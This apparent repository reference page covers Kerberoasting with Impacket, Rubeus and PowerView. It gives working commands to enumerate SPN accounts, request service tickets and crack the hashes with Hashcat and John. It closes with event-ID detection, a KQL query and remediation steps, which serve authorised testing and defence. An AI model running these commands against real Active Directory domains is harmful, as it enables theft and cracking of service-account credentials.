creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-13 06:34:57 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
d5f3fa32486ea335db802d68fe2147fa2da69583
Anthropic-Cybersecurity-Skills/skills/exploiting-kerberoasting-with-impacket/references/api-reference.md
T
mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal 
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00

2.2 KiB
Raw Blame History

API Reference: Kerberoasting with Impacket

MITRE ATT&CK T1558.003 — Kerberoasting

Attack Flow

  1. Authenticate to AD with domain user credentials
  2. Query LDAP for accounts with SPNs
  3. Request TGS tickets for those SPNs
  4. Extract ticket hashes
  5. Crack offline with wordlist

Impacket — GetUserSPNs.py

Enumerate SPN Accounts

GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.1

Request TGS Tickets

GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.1 \
    -request -outputfile kerberoast.txt

With NTLM Hash

GetUserSPNs.py domain.local/user -hashes :NTLM_HASH -dc-ip 10.10.10.1 -request

Output Format (Hashcat mode 13100)

$krb5tgs$23$*svc_sql$DOMAIN.LOCAL$...$<hash>

Rubeus — Windows Kerberoasting

Kerberoast All SPNs

Rubeus.exe kerberoast /outfile:hashes.txt

Target Specific User

Rubeus.exe kerberoast /user:svc_sql /outfile:hashes.txt

RC4 Only (weaker, easier to crack)

Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt

Hash Cracking

Hashcat

# Kerberos 5 TGS-REP etype 23 (RC4)
hashcat -m 13100 hashes.txt wordlist.txt

# Kerberos 5 TGS-REP etype 17 (AES-128)
hashcat -m 19600 hashes.txt wordlist.txt

# Kerberos 5 TGS-REP etype 18 (AES-256)
hashcat -m 19700 hashes.txt wordlist.txt

John the Ripper

john --wordlist=wordlist.txt hashes.txt

PowerShell Enumeration

Find SPN Accounts

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} `
    -Properties ServicePrincipalName, PasswordLastSet

Request TGS (PowerView)

Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash

Detection

Event IDs

Event Description
4769 Kerberos Service Ticket Request
4770 Service Ticket Renewed

Detection Query

SecurityEvent
| where EventID == 4769
| where TicketEncryptionType == "0x17"  // RC4
| where ServiceName !endswith "$"
| summarize count() by Account, ServiceName

Remediation

  1. Use Group Managed Service Accounts (gMSA)
  2. Set strong passwords (25+ characters) on SPN accounts
  3. Enable AES encryption for Kerberos (disable RC4)
  4. Monitor Event 4769 for anomalous TGS requests
Reference in New Issue View Git Blame Copy Permalink